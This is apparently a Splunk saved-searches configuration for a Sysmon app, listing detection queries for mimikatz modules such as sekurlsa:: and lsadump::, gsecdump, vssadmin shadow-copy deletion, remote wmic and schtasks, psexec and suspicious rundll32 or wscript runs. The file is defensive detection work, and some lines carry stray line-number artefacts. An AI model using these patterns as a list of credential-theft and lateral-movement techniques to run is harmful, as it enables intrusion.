display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.page.search.mode = verbose
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` ParentImage="*\\services.exe" | regex CommandLine="\\\\[a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12}\.exe-S$"

[mimikatz]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
dispatchAs = user
display.events.fields =
["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 198 | display.page.search.mode = verbose 199 | display.visualizations.charting.chart = bar 200 | display.visualizations.show = 0 201 | request.ui_dispatch_app = sysmon-splunk-app 202 | request.ui_dispatch_view = search 203 | search = `sysmon` CommandLine="*privileges::debug*" OR CommandLine="*sekurlsa::*" OR CommandLine="*kerberos::*" OR CommandLine="*crypto::*" OR CommandLine="*lsadump::*" OR CommandLine="*process::*" 204 | 205 | [gsecdump] 206 | action.email.useNSSubject = 1 207 | alert.track = 0 208 | dispatch.earliest_time = -24h@h 209 | dispatch.latest_time = now 210 | dispatchAs = user 211 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 212 | 
display.page.search.mode = verbose 213 | display.visualizations.charting.chart = bar 214 | display.visualizations.show = 0 215 | request.ui_dispatch_app = sysmon-splunk-app 216 | request.ui_dispatch_view = search 217 | search = `sysmon` process="g64-*" | regex process="\\\\g64-[a-z0-9]{3}\.exe$" 218 | 219 | [wmic - process call create] 220 | action.email.useNSSubject = 1 221 | alert.track = 0 222 | dispatch.earliest_time = -24h@h 223 | dispatch.latest_time = now 224 | dispatchAs = user 225 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 226 | display.page.search.mode = verbose 227 | display.visualizations.charting.chart = bar 228 | display.visualizations.show = 0 229 | request.ui_dispatch_app = sysmon-splunk-app 230 | request.ui_dispatch_view = search 231 | search = `sysmon` process="WMIC.exe" CommandLine="*process call create*" 232 | 233 | [wmiprvse - parent execution] 234 | action.email.useNSSubject = 1 235 | alert.track = 0 236 | dispatch.earliest_time = -24h@h 237 | dispatch.latest_time = now 238 | dispatchAs = user 239 | display.events.fields = 
["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 240 | display.general.type = statistics 241 | display.page.search.mode = verbose 242 | display.page.search.tab = statistics 243 | display.visualizations.charting.chart = bar 244 | display.visualizations.show = 0 245 | request.ui_dispatch_app = sysmon-splunk-app 246 | request.ui_dispatch_view = search 247 | search = `sysmon` ParentImage="WmiPrvSE.exe" | stats count by Computer,CommandLine 248 | 249 | [wmic - /node] 250 | action.email.useNSSubject = 1 251 | alert.track = 0 252 | dispatch.earliest_time = -24h@h 253 | dispatch.latest_time = now 254 | dispatchAs = user 255 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 256 | display.page.search.mode = verbose 257 | 
display.visualizations.charting.chart = bar 258 | display.visualizations.show = 0 259 | request.ui_dispatch_app = sysmon-splunk-app 260 | request.ui_dispatch_view = search 261 | search = `sysmon` process="WMIC.exe" CommandLine="*/NODE:*" 262 | 263 | [vssadmin - delete] 264 | action.email.useNSSubject = 1 265 | alert.track = 0 266 | dispatchAs = user 267 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 268 | display.page.search.mode = verbose 269 | display.visualizations.charting.chart = bar 270 | display.visualizations.show = 0 271 | request.ui_dispatch_app = sysmon-splunk-app 272 | request.ui_dispatch_view = search 273 | search = `sysmon` EventCode=1 process=vssadmin.exe | search CommandLine="*vssadmin*" CommandLine="*Delete *" CommandLine="*Shadows*" 274 | 275 | [taskeng - parentproc all] 276 | action.email.useNSSubject = 1 277 | alert.track = 0 278 | dispatch.earliest_time = -24h@h 279 | dispatch.latest_time = now 280 | dispatchAs = user 281 | display.events.fields = 
["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 282 | display.general.type = statistics 283 | display.page.search.mode = verbose 284 | display.page.search.tab = statistics 285 | display.visualizations.charting.chart = bar 286 | display.visualizations.show = 0 287 | request.ui_dispatch_app = sysmon-splunk-app 288 | request.ui_dispatch_view = search 289 | search = `sysmon` ParentImage="taskeng.exe" | stats count by Computer,CommandLine 290 | 291 | [schtasks - run] 292 | action.email.useNSSubject = 1 293 | alert.track = 0 294 | dispatch.earliest_time = -24h@h 295 | dispatch.latest_time = now 296 | dispatchAs = user 297 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 298 | display.page.search.mode = verbose 299 
| display.visualizations.charting.chart = bar 300 | display.visualizations.show = 0 301 | request.ui_dispatch_app = sysmon-splunk-app 302 | request.ui_dispatch_view = search 303 | search = `sysmon` process="schtasks.exe" CommandLine="*/Run*" CommandLine="*/s *" 304 | 305 | [schtasks - delete] 306 | action.email.useNSSubject = 1 307 | alert.track = 0 308 | dispatch.earliest_time = -24h@h 309 | dispatch.latest_time = now 310 | dispatchAs = user 311 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 312 | display.page.search.mode = verbose 313 | display.visualizations.charting.chart = bar 314 | display.visualizations.show = 0 315 | request.ui_dispatch_app = sysmon-splunk-app 316 | request.ui_dispatch_view = search 317 | search = `sysmon` process="schtasks.exe" CommandLine="*/Delete*" CommandLine="*/s *" 318 | 319 | [schtasks - create] 320 | action.email.useNSSubject = 1 321 | alert.track = 0 322 | dispatch.earliest_time = -24h@h 323 | dispatch.latest_time = now 324 | dispatchAs = user 325 | display.events.fields = 
["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 326 | display.page.search.mode = verbose 327 | display.visualizations.charting.chart = bar 328 | display.visualizations.show = 0 329 | request.ui_dispatch_app = sysmon-splunk-app 330 | request.ui_dispatch_view = search 331 | search = `sysmon` process="schtasks.exe" CommandLine="*/Create*" CommandLine="*/s *" 332 | 333 | [schtasks - change] 334 | action.email.useNSSubject = 1 335 | alert.track = 0 336 | dispatch.earliest_time = -24h@h 337 | dispatch.latest_time = now 338 | dispatchAs = user 339 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 340 | display.page.search.mode = verbose 341 | display.visualizations.charting.chart = bar 342 | 
display.visualizations.show = 0 343 | request.ui_dispatch_app = sysmon-splunk-app 344 | request.ui_dispatch_view = search 345 | search = `sysmon` process="schtasks.exe" CommandLine="*/Change*" CommandLine="*/s *" 346 | 347 | [schtasks - all] 348 | action.email.useNSSubject = 1 349 | alert.track = 0 350 | dispatch.earliest_time = -24h@h 351 | dispatch.latest_time = now 352 | dispatchAs = user 353 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 354 | display.general.type = statistics 355 | display.page.search.mode = verbose 356 | display.page.search.tab = statistics 357 | display.visualizations.charting.chart = bar 358 | display.visualizations.show = 0 359 | request.ui_dispatch_app = sysmon-splunk-app 360 | request.ui_dispatch_view = search 361 | search = `sysmon` process="schtasks.exe"| stats count by Computer,CommandLine 362 | 363 | [rundll32 - suspicious execution] 364 | action.email.useNSSubject = 1 365 | alert.track = 0 366 | dispatch.earliest_time = -24h@h 367 | dispatch.latest_time = now 368 | display.events.fields = 
["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 369 | display.page.search.mode = verbose 370 | display.visualizations.charting.chart = bar 371 | display.visualizations.show = 0 372 | request.ui_dispatch_app = sysmon-splunk-app 373 | request.ui_dispatch_view = search 374 | search = `sysmon` EventCode=1 rundll32.exe \ 375 | | search Image="rundll32.exe" (CommandLine="AppData\\Local\\Temp*" CommandLine="*qwerty*") \ 376 | OR (ParentImage="winword.exe" \ 377 | OR ParentImage="excel.exe" OR ParentImage="cscript.exe" \ 378 | OR ParentImage="wscript.exe" OR ParentImage="mshta.exe") 379 | 380 | [psexecsvc - all] 381 | action.email.useNSSubject = 1 382 | alert.track = 0 383 | dispatchAs = user 384 | display.events.fields = 
["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 385 | display.general.type = statistics 386 | display.page.search.mode = verbose 387 | display.page.search.tab = statistics 388 | display.visualizations.charting.chart = bar 389 | display.visualizations.show = 0 390 | request.ui_dispatch_app = sysmon-splunk-app 391 | request.ui_dispatch_view = search 392 | search = `sysmon` ParentImage="PSEXESVC.EXE" | stats count by Image,Hashes 393 | 394 | [psexec - IMPHASH not psexec.exe] 395 | action.email.useNSSubject = 1 396 | alert.track = 0 397 | dispatch.earliest_time = -24h@h 398 | dispatch.latest_time = now 399 | dispatchAs = user 400 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 401 | display.page.search.mode = 
verbose 402 | display.visualizations.charting.chart = bar 403 | display.visualizations.show = 0 404 | request.ui_dispatch_app = sysmon-splunk-app 405 | request.ui_dispatch_view = search 406 | search = `sysmon` Hashes="*IMPHASH=B18A1401FF8F444056D29450FBC0A6CE*" NOT process="*PsExec.exe" 407 | 408 | [psexec - IMPHASH] 409 | action.email.useNSSubject = 1 410 | alert.track = 0 411 | dispatch.earliest_time = -24h@h 412 | dispatch.latest_time = now 413 | dispatchAs = user 414 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 415 | display.page.search.mode = verbose 416 | display.visualizations.charting.chart = bar 417 | display.visualizations.show = 0 418 | request.ui_dispatch_app = sysmon-splunk-app 419 | request.ui_dispatch_view = search 420 | search = `sysmon` Hashes="*IMPHASH=B18A1401FF8F444056D29450FBC0A6CE*" 421 | 422 | [powershell - invoke-command] 423 | action.email.useNSSubject = 1 424 | alert.track = 0 425 | dispatch.earliest_time = -24h@h 426 | dispatch.latest_time = now 427 | dispatchAs = user 428 | display.events.fields = 
["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 429 | display.page.search.mode = verbose 430 | display.visualizations.charting.chart = bar 431 | display.visualizations.show = 0 432 | request.ui_dispatch_app = sysmon-splunk-app 433 | request.ui_dispatch_view = search 434 | search = `sysmon` process="*powershell.exe" CommandLine="*Invoke-Command*" 435 | 436 | [at execution] 437 | action.email.useNSSubject = 1 438 | alert.track = 0 439 | dispatch.earliest_time = -24h@h 440 | dispatch.latest_time = now 441 | dispatchAs = user 442 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 443 | display.general.type = statistics 444 | display.page.search.mode = verbose 445 | display.page.search.tab = statistics 446 | 
display.visualizations.charting.chart = bar 447 | display.visualizations.show = 0 448 | request.ui_dispatch_app = sysmon-splunk-app 449 | request.ui_dispatch_view = search 450 | search = `sysmon` ParentImage="at.exe" | stats count by Computer,CommandLine 451 | 452 | [wsmprovhost - powershell] 453 | action.email.useNSSubject = 1 454 | alert.track = 0 455 | dispatch.earliest_time = -24h@h 456 | dispatch.latest_time = now 457 | dispatchAs = user 458 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 459 | display.general.type = statistics 460 | display.page.search.mode = verbose 461 | display.page.search.tab = statistics 462 | display.visualizations.charting.chart = bar 463 | display.visualizations.show = 0 464 | request.ui_dispatch_app = sysmon-splunk-app 465 | request.ui_dispatch_view = search 466 | search = `sysmon` ParentImage="*wsmprovhost.exe" | stats count by Computer,CommandLine 467 | 468 | [msbuild - all] 469 | action.email.useNSSubject = 1 470 | alert.track = 0 471 | dispatch.earliest_time = -24h@h 472 | dispatch.latest_time = now 473 | dispatchAs = user 474 | display.events.fields = 
["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 475 | display.general.type = statistics 476 | display.page.search.mode = verbose 477 | display.page.search.tab = statistics 478 | display.visualizations.charting.chart = bar 479 | display.visualizations.show = 0 480 | request.ui_dispatch_app = sysmon-splunk-app 481 | request.ui_dispatch_view = search 482 | search = `sysmon` process="msbuild.exe"| stats count by Computer,CommandLine 483 | 484 | [rundll32.exe - all] 485 | action.email.useNSSubject = 1 486 | alert.track = 0 487 | dispatch.earliest_time = -24h@h 488 | dispatch.latest_time = now 489 | dispatchAs = user 490 | display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"] 491 | display.general.type = statistics 492 | 
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process="rundll32.exe"| stats count by Computer,CommandLine

[rundll32.exe - Control_RunDLL]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process="rundll32.exe" CommandLine="*,Control_RunDLL"| stats count by Computer,CommandLine

[rundll32.exe - DllRegisterServer]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process="rundll32.exe" DllRegisterServer | stats count by Computer,CommandLine

[rundll32.exe - \\roaming\\ execution]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process=rundll32.exe \\roaming\\ | stats count by Computer,CommandLine,ParentCommandLine

[cscript - http]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process="cscript.exe" http | stats count by Computer,CommandLine

[wscript - js execution]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
search = `sysmon` process="wscript.exe" .js | stats count by Computer,CommandLine

[wscript - vbs or vbe execution]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
dispatchAs = user
display.events.fields = ["host","source","sourcetype","action","app","CommandLine","Computer","CreationUtcTime","CurrentDirectory","dest","direction","dvc","EventChannel","EventCode","EventDescription","eventtype","Hashes","process","index","IntegrityLevel","Keywords","Level","linecount","LogonGuid","LogonId","Opcode","ParentCommandLine","ParentImage","ParentProcessGuid","ParentProcessId","PreviousCreationUtcTime","process","process_id","ProcessGuid","ProcessId","punct","RecordID","SecurityID","session_id","signature","signature_id","splunk_server","tag","tag::eventtype","TargetFilename","Task","TerminalSessionId","TimeCreated","timestamp","User","user","UtcTime","vendor_product","Version"]
display.general.type = statistics
display.page.search.mode = verbose
display.page.search.tab = statistics
display.visualizations.charting.chart = bar
display.visualizations.show = 0
request.ui_dispatch_app = sysmon-splunk-app
request.ui_dispatch_view = search
# AND binds tighter than OR in SPL; the parentheses keep the process filter applied to both extensions
search = `sysmon` process="wscript.exe" (CommandLine=*.vbs* OR CommandLine=*.vbe*) | stats count by Computer,CommandLine

[wscript - Suspicious rar/zip userprofile execution]
action.email.useNSSubject = 1
alert.track = 0
dispatch.earliest_time = -24h@h
dispatch.latest_time = now
dispatchAs = user
